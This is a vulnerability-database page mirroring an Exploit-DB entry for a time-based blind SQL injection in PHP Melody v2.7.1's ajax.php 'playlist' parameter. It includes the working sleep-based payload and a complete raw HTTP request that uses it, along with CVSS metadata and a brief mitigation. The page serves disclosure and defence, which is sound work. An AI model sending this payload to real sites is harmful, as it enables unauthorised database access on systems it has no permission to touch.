PHP Melody v2.7.1 - SQL Injection

vendor:

PHP Melody

by:

Ahmad Mahfouz

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: PHP Melody

Affected Version From: 2.7.1

Affected Version To: 2.7.1

Patch Exists: YES

Related CWE: N/A

CPE: a:phpsugar:phpmelody

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Mac OS

2017

PHP Melody v2.7.1 – SQL Injection

PHP Melody v2.7.1 is vulnerable to a time-based blind SQL injection in the 'playlist' parameter of the 'ajax.php' page. An attacker can send a malicious HTTP request with a payload of '+(select*from(select(sleep(20)))a)+' to the vulnerable page to cause a delay in the response time, indicating a successful exploitation.

Mitigation:

Input validation should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

# Exploit Title: PHP Melody v2.7.1 - SQL Injection
# Date: 30/12/2017
# Exploit Author: Ahmad Mahfouz 
# Contact: http://twitter.com/eln1x
# Vendor Homepage: http://www.phpsugar.com/ Buy http://www.phpsugar.com/phpmelody_order.html
# Version: 2.7.1
# Tested on: Mac OS
#
# SQL Injection Type: time-based blind
# Parameter: playlist
# Page: ajax.php
# URL: http://target.com/ajax.php?p=video&do=getplayer&vid=[VALID_VIDO_ID]&aid=1&player=detail&playlist=[SQLi]

 

GET /ajax.php?p=video&do=getplayer&vid=randomid&aid=1&player=detail&playlist='+(select*from(select(sleep(20)))a)+' HTTP/1.1
Host: localhost
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close